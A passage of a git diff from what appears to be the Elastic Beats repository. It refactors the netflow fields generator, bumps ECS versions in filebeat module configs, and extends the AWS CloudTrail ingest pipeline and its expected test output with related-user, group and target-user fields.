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" } diff --git a/x-pack/filebeat/input/netflow/fields_gen.go b/x-pack/filebeat/input/netflow/fields_gen.go index 5e41a3087660..66b77283c90b 100644 --- a/x-pack/filebeat/input/netflow/fields_gen.go +++ b/x-pack/filebeat/input/netflow/fields_gen.go @@ -14,17 +14,17 @@ import ( "fmt" "io" "io/ioutil" + "log" "os" + "sort" + "strconv" "strings" "github.com/elastic/beats/v7/x-pack/filebeat/input/netflow" ) var ( - outputFile = flag.String("output", "zfields.go", "Output file") - nameCol = flag.Int("column-name", 0, "Index of column with field name") - typeCol = flag.Int("column-type", 0, "Index of column with field type") - indent = flag.Int("indent", 0, "Number of spaces to indent") + outputFile = flag.String("output", "fields.yml", "Output file") header = flag.String("header", "fields.header.yml", "File with header fields to prepend") ) @@ -53,89 +53,141 @@ var typesToElasticTypes = map[string]string{ "ipv6address": "ip", } -var indentString string - -func makeIndent(n int) (s []byte) { - if n > 0 { - s = make([]byte, n) - for i := 0; i < n; i++ { - s[i] = ' ' - } - } - return s -} - -func write(w io.Writer, msg string) { - for _, line := range strings.Split(msg, "\n") { - writeLine(w, indentString+line+"\n") - } -} - -func writeLine(w io.Writer, line string) { - if n, err := w.Write([]byte(line)); err != nil || n != len(line) { - fmt.Fprintf(os.Stderr, "Failed writing to %s: %v\n", *outputFile, err) - os.Exit(4) - } -} - func usage() { - fmt.Fprintf(os.Stderr, "Usage: fields_gen [-output file.yml] [--column-{name|type}=N]* \n") + fmt.Fprintf(os.Stderr, "Usage: fields_gen [-header=file] [-output=file.yml] [input-csv,name-column,type-column,has-header]+\n") flag.PrintDefaults() os.Exit(1) } -func requireColumn(colFlag *int, argument string) { - if *colFlag <= 0 { - fmt.Fprintf(os.Stderr, "Required argument %s not provided\n", argument) - usage() - } -} - func main() { + log.SetFlags(0) flag.Usage = usage flag.Parse() + if len(flag.Args()) == 0 { - fmt.Fprintf(os.Stderr, "No CSV file to parse provided\n") + fmt.Fprintf(os.Stderr, "No CSV file args to parse provided\n") usage() } - csvFile := flag.Args()[0] - if len(csvFile) == 0 { - fmt.Fprintf(os.Stderr, "Argument -input is required\n") - os.Exit(2) + + if err := generateFieldsYml(flag.Args()); err != nil { + log.Fatal(err) } +} - requireColumn(nameCol, "--column-name") - requireColumn(typeCol, "--column-type") +func generateFieldsYml(args []string) error { + // Parse the arguments containing file path and parsing parameters. + var csvFiles []CSVFile + for _, v := range flag.Args() { + csvFile, err := NewCSVFileFromArg(v) + if err != nil { + return err + } + csvFiles = append(csvFiles, *csvFile) + } - indentString = string(makeIndent(*indent)) + // Read in all the field data. + var allFields []map[string]string + for _, csvFile := range csvFiles { + fields, err := csvFile.ReadFields() + if err != nil { + return err + } + allFields = append(allFields, fields) + } - fHandle, err := os.Open(csvFile) + // Merge fields and resolve conflicts in the data types. + fields, err := mergeFields(allFields...) if err != nil { - fmt.Fprintf(os.Stderr, "Failed to open %s: %v\n", csvFile, err) - os.Exit(2) + return err } - defer fHandle.Close() - outHandle, err := os.Create(*outputFile) - if err != nil { - fmt.Fprintf(os.Stderr, "Failed to create %s: %v\n", *outputFile, err) - os.Exit(3) + // Sort fields alphabetically by name. + type netflowField struct { + Name, Type string } - defer outHandle.Close() + var sortedFields []netflowField + for k, v := range fields { + sortedFields = append(sortedFields, netflowField{k, v}) + } + sort.Slice(sortedFields, func(i, j int) bool { + return sortedFields[i].Name < sortedFields[j].Name + }) headerHandle, err := os.Open(*header) if err != nil { - fmt.Fprintf(os.Stderr, "Failed to open %s: %v\n", *header, err) - os.Exit(2) + return fmt.Errorf("failed to open %s: %v", *header, err) } defer headerHandle.Close() fileHeader, err := ioutil.ReadAll(headerHandle) if err != nil { - fmt.Fprintf(os.Stderr, "Failed to read %s: %v\n", *header, err) - os.Exit(2) + return fmt.Errorf("failed to read header %s: %v", *header, err) } - write(outHandle, string(fileHeader)) + + outHandle, err := os.Create(*outputFile) + if err != nil { + return fmt.Errorf("failed to open %s: %v", *outputFile, err) + } + defer outHandle.Close() + + out := bufio.NewWriter(outHandle) + defer out.Flush() + + // Write output file. + writeLine(out, strings.Repeat("#", 40)) + writeLine(out, "# This file is generated. Do not modify.") + writeLine(out, strings.Repeat("#", 40)) + writeLine(out, string(fileHeader)) + + for _, f := range sortedFields { + writeLine(out, " - name: "+f.Name) + writeLine(out, " type: "+f.Type) + writeLine(out, "") + } + return nil +} + +// CSVFile represents a CSV file with containing netflow field information +// (field name, data type). +type CSVFile struct { + Path string + NameColumn int + TypeColumn int + Header bool +} + +func NewCSVFileFromArg(arg string) (*CSVFile, error) { + r := csv.NewReader(strings.NewReader(arg)) + parts, err := r.Read() + if err != nil { + return nil, fmt.Errorf("failed to parse argument %q: %w", arg, err) + } + if len(parts) != 4 { + return nil, fmt.Errorf("input argument must consist of 4 parts [path,name-column,type-column,header]") + } + + a := &CSVFile{} + a.Path = parts[0] + if a.NameColumn, err = strconv.Atoi(parts[1]); err != nil { + return nil, fmt.Errorf("failed to parse name column %q: %w", parts[1], err) + } + if a.TypeColumn, err = strconv.Atoi(parts[2]); err != nil { + return nil, fmt.Errorf("failed to parse type column %q: %w", parts[2], err) + } + if a.Header, err = strconv.ParseBool(parts[3]); err != nil { + return nil, fmt.Errorf("failed to parse header column %q: %w", parts[3], err) + } + return a, nil +} + +// ReadFields reads the fields contained in the CSV file and returns a map +// of names to Elasticsearch data type. +func (a CSVFile) ReadFields() (map[string]string, error) { + fHandle, err := os.Open(a.Path) + if err != nil { + return nil, fmt.Errorf("failed to open %v: %w", a.Path, err) + } + defer fHandle.Close() filtered := bytes.NewBuffer(nil) scanner := bufio.NewScanner(fHandle) @@ -145,6 +197,11 @@ func main() { filtered.WriteByte('\n') } } + if scanner.Err() != nil { + return nil, fmt.Errorf("failed reading from %v: %w", a.Path, err) + } + + fields := map[string]string{} reader := csv.NewReader(filtered) for lineNum := 1; ; lineNum++ { record, err := reader.Read() @@ -152,22 +209,21 @@ func main() { if err == io.EOF { break } - fmt.Fprintf(os.Stderr, "read of %s failed: %v\n", csvFile, err) - os.Exit(5) + return nil, fmt.Errorf("read of %s failed: %v\n", a.Path, err) } + n := len(record) vars := make(map[string]string) for _, f := range []struct { column int name string }{ - {*nameCol, "name"}, - {*typeCol, "type"}, + {a.NameColumn, "name"}, + {a.TypeColumn, "type"}, } { if f.column > 0 { if f.column > n { - fmt.Fprintf(os.Stderr, "%s column is out of range in line %d\n", f.name, lineNum) - os.Exit(6) + return nil, fmt.Errorf("%s column is out of range in line %d\n", f.name, lineNum) } vars[f.name] = record[f.column-1] } @@ -175,13 +231,49 @@ func main() { if len(vars["type"]) == 0 { continue } + esType, found := typesToElasticTypes[strings.ToLower(vars["type"])] if !found { continue } - write(outHandle, fmt.Sprintf(` - name: %s - type: %s -`, - netflow.CamelCaseToSnakeCase(vars["name"]), esType)) + + fields[netflow.CamelCaseToSnakeCase(vars["name"])] = esType + } + + return fields, nil +} + +func mergeFields(allFields ...map[string]string) (map[string]string, error) { + out := map[string]string{} + for _, fields := range allFields { + for name, esType := range fields { + if existingESType, found := out[name]; found { + var err error + esType, err = resolveConflict(existingESType, esType) + if err != nil { + return nil, fmt.Errorf("field %v: %w", name, err) + } + } + out[name] = esType + } + } + return out, nil +} + +func resolveConflict(a, b string) (string, error) { + if a == b { + // No conflict. + return a, nil + } + if a == "keyword" || b == "keyword" { + // If either is a keyword then use that. + return "keyword", nil + } + return "", fmt.Errorf("cannot resolve type conflict between %v != %v", a, b) +} + +func writeLine(w io.StringWriter, line string) { + if _, err := w.WriteString(line + "\n"); err != nil { + log.Fatalf("Failed writing line: %v", err) } } diff --git a/x-pack/filebeat/module/activemq/audit/config/audit.yml b/x-pack/filebeat/module/activemq/audit/config/audit.yml index 8077b2e41647..5b5cf7df03fd 100644 --- a/x-pack/filebeat/module/activemq/audit/config/audit.yml +++ b/x-pack/filebeat/module/activemq/audit/config/audit.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/activemq/log/config/log.yml b/x-pack/filebeat/module/activemq/log/config/log.yml index 1ef09c9f5043..58a8f27a0f33 100644 --- a/x-pack/filebeat/module/activemq/log/config/log.yml +++ b/x-pack/filebeat/module/activemq/log/config/log.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml b/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml index 4cc64e9e561f..fc501fd47058 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml @@ -66,4 +66,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/config/file.yml b/x-pack/filebeat/module/aws/cloudtrail/config/file.yml index 6339940d432f..8e04baa33954 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/config/file.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/ingest/pipeline.yml b/x-pack/filebeat/module/aws/cloudtrail/ingest/pipeline.yml index 76cf0f936b66..c2a46c880904 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/ingest/pipeline.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/ingest/pipeline.yml @@ -27,6 +27,11 @@ processors: field: "json.userIdentity.type" target_field: "aws.cloudtrail.user_identity.type" ignore_failure: true + - append: + field: related.user + value: '{{json.userIdentity.userName}}' + allow_duplicates: false + if: 'ctx.json?.userIdentity?.userName != null' - rename: field: "json.userIdentity.userName" target_field: "user.name" @@ -225,28 +230,16 @@ processors: field: "json.vpcEndpointId" target_field: "aws.cloudtrail.vpc_endpoint_id" ignore_failure: true - - script: - lang: painless - ignore_failure: true - source: >- - void addRelatedUser(def ctx, String userName) { - if (ctx.related == null) { - Map map = new HashMap(); - ctx.put("related", map); - } - if (ctx.related.user == null) { - ArrayList al = new ArrayList(); - ctx.related.put("user", al); - } - ctx.related.user.add(userName); - } - if (ctx?.aws?.cloudtrail?.flattened?.request_parameters?.userName != null) { - addRelatedUser(ctx, ctx.aws.cloudtrail.flattened.request_parameters.userName); - } - if (ctx?.aws?.cloudtrail?.flattened?.request_parameters?.newUserName != null) { - addRelatedUser(ctx, ctx.aws.cloudtrail.flattened.request_parameters.newUserName); - } - + - append: + field: related.user + value: '{{aws.cloudtrail.flattened.request_parameters.userName}}' + allow_duplicates: false + if: 'ctx.aws?.cloudtrail?.flattened?.request_parameters?.userName != null' + - append: + field: related.user + value: '{{aws.cloudtrail.flattened.request_parameters.newUserName}}' + allow_duplicates: false + if: 'ctx.aws?.cloudtrail?.flattened?.request_parameters?.newUserName != null' - script: lang: painless ignore_failure: true @@ -685,6 +678,32 @@ processors: field: "json.insightDetails" target_field: "aws.cloudtrail.insight_details" ignore_failure: true + - set: + field: group.id + value: '{{aws.cloudtrail.flattened.response_elements.group.groupId}}' + ignore_empty_value: true + ignore_failure: true + - set: + field: user.target.id + value: '{{aws.cloudtrail.flattened.response_elements.user.userId}}' + ignore_empty_value: true + ignore_failure: true + - set: + field: user.changes.name + value: '{{aws.cloudtrail.flattened.request_parameters.newUserName}}' + ignore_empty_value: true + ignore_failure: true + - set: + field: group.name + value: '{{aws.cloudtrail.flattened.request_parameters.groupName}}' + ignore_empty_value: true + ignore_failure: true + - set: + field: user.target.name + value: '{{aws.cloudtrail.flattened.request_parameters.userName}}' + ignore_empty_value: true + ignore_failure: true + - remove: field: - "json" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json index 2f49aa151341..50253665f083 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json @@ -27,9 +27,11 @@ "change" ], "fileset.name": "cloudtrail", + "group.name": "admin", "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -40,6 +42,7 @@ ], "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "AWSConsole" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json index 886d94486ad5..f6bb959a8d6c 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json @@ -29,6 +29,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", @@ -70,6 +73,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 720, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json index 4d715f617695..ca6b38754cb3 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json @@ -32,6 +32,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "JohnDoe" + ], "service.type": "aws", "source.address": "192.0.2.110", "source.ip": "192.0.2.110", @@ -82,6 +85,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 658, + "related.user": [ + "JaneDoe" + ], "service.type": "aws", "source.address": "192.0.2.100", "source.ip": "192.0.2.100", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json index 9736605a6b2c..bfce5b07ccb4 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json @@ -38,6 +38,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -48,6 +49,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json index c3a33c948e4a..7487c6d6581d 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json +++ 